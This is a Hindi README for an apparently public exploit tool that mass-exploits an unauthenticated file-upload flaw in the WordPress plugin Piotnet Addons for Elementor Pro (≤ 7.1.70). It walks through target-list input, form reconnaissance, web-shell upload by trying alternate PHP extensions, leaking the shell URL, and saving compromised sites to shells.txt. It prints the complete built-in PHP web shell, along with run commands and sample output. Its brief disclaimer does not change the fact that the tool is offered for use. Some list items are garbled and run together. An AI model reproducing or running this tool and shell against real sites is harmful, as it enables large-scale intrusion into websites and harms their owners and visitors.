
Piotnet Addons for Elementor Pro <= 7.1.70 - फ़ॉर्म फ़ाइल अपलोड के माध्यम से अप्रमाणित मनमाना फ़ाइल अपलोड
अप्रमाणित मनमाना फ़ाइल अपलोड जो Piotnet Addons for Elementor Pro ≤ 7.1.70 में दूरस्थ कोड निष्पादन (RCE) की ओर ले जाता है।
यह उपकरण बड़े पैमाने पर शोषण के लिए डिज़ाइन किया गया है – इसे लक्ष्यों की एक सूची दें, और यह स्वचालित रूप से:
post_id, form_id, और सही अपलोड फ़ील्ड नाम निकालने के लिए उन्नत टोही करें.phtml, .php3, .php4, .phps, .pht, .php2)pafe_export_database के माध्यम से अपलोड किए गए शेल URL को लीक करेंLogic_Internet स्ट्रिंग खोजें) और URL को shells.txt में सहेजें⚠️ अस्वीकरण
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है।अधिक अस्वीकरण आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं।
data-pafe-form-builder-field-name, data-elementor-id, आदि)https:// जोड़ता है/contact, /apply, /quote, /book-appointment, …)wp-content/uploads/piotnet-addons-for-elementor/ और सीधे रूट पथ दोनों से मेल खाता हैrequests लाइब्रेरीpip install requests
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885
targets.txt (या कोई भी नाम) नामक एक फ़ाइल बनाएं जिसमें प्रति पंक्ति एक URL हो:
https://example1.com
example2.com
http://vulnerable-site.org
python2 CVE-2026-4885.py targets.txt
स्क्रिप्ट यह करेगी:
· प्रत्येक लक्ष्य के लिए प्रगति दिखाएगा
· सफल शेल URL को shells.txt में सहेजेगा
उदाहरण आउटपुट
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
कमांड लाइन विकल्प (स्क्रिप्ट में अनुकूलन योग्य)
आप स्क्रिप्ट के शीर्ष को संपादित करके इन्हें बदल सकते हैं।
अंतर्निहित शेल है:
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>
· सर्वर जानकारी, वर्तमान कार्यशील निर्देशिका और एक फ़ाइल अपलोड फॉर्म प्रदर्शित करता है। · इसे किसी भी अन्य PHP कोड से बदला जा सकता है (स्क्रिप्ट में केवल SHELL_CODE बदलें)।
संस्करण पहचान
· प्लगइन संपत्तियों में ?ver= के लिए होमपेज खोजता है।
· ज्ञात CSS/JS फ़ाइलों के अस्तित्व की जाँच करने पर वापस आता है।
टोही
· सामान्य फॉर्म पृष्ठों और होमपेज पर मिले सभी आंतरिक लिंक को क्रॉल करता है।
· Piotnet‑विशिष्ट HTML विशेषताओं से post_id, form_id, और सही फ़ाइल अपलोड फ़ील्ड नाम निकालता है।
अपलोड
· wp-admin/admin-ajax.php?action=pafe_ajax_form_builder पर एक मल्टीपार्ट POST अनुरोध भेजता है।
· एक JSON पेलोड का उपयोग करता है जो प्लगइन के अपलोड तंत्र का अनुकरण करता है।
· EXT_LIST में सभी एक्सटेंशन तब तक आज़माता है जब तक एक सफल न हो जाए।
लीक
· pafe_export_database का अनुरोध करता है जो अपलोड की गई फ़ाइल का पूरा URL वाला CSV लौटाता है।
· एक regex पैटर्न का उपयोग करके URL को पार्स करता है जो xxx-{random}.ext से मेल खाता है।
सत्यापन
· लीक किए गए URL पर जाता है।
· Logic_Internet स्ट्रिंग की उपस्थिति की जाँच करता है।
· सफलता पर URL को shells.txt में सहेजता है।
Windows पर UnicodeEncodeError
स्क्रिप्ट में पहले से ही एक safe_unicode() फ़ंक्शन शामिल है जो गैर‑ASCII वर्णों को संभालता है। यदि आप अभी भी त्रुटियाँ देखते हैं, तो सुनिश्चित करें कि आपका टर्मिनल UTF‑8 का समर्थन करता है:
chcp 65001
कोई फॉर्म नहीं मिला / सभी एक्सटेंशन विफल
· लक्ष्य पैच किया गया हो सकता है या Piotnet Addons का उपयोग नहीं कर रहा हो। · TIMEOUT या MAX_THREADS बढ़ाने का प्रयास करें। · मैन्युअल रूप से सत्यापित करें कि प्लगइन वास्तव में स्थापित है।
लीक विफल होता है लेकिन अपलोड सफल हुआ
· pafe_export_database एंडपॉइंट अक्षम या सुरक्षित हो सकता है।
· यह देखने के लिए ब्राउज़र में मैन्युअल रूप से /wp-admin/admin-ajax.php?action=pafe_export_database तक पहुँचने का प्रयास करें कि यह सुलभ है या नहीं।
· इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके परीक्षण के लिए आपके पास लिखित अनुमति है। · लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है। · सभी लागू कानूनों का सम्मान करें।
| चर | विवरण | डिफ़ॉल्ट |
|---|
| TIMEOUT | HTTP अनुरोध टाइमआउट | 10 सेकंड |
| MAX_THREADS | समवर्ती थ्रेड्स की संख्या | 20 |
| OUTPUT_FILE | सफल शेल URL कहाँ सहेजें | shells.txt |
| EXT_LIST | आज़माने के लिए फ़ाइल एक्सटेंशन | .phtml, .php3, .php4, .phps, .pht, .php2 |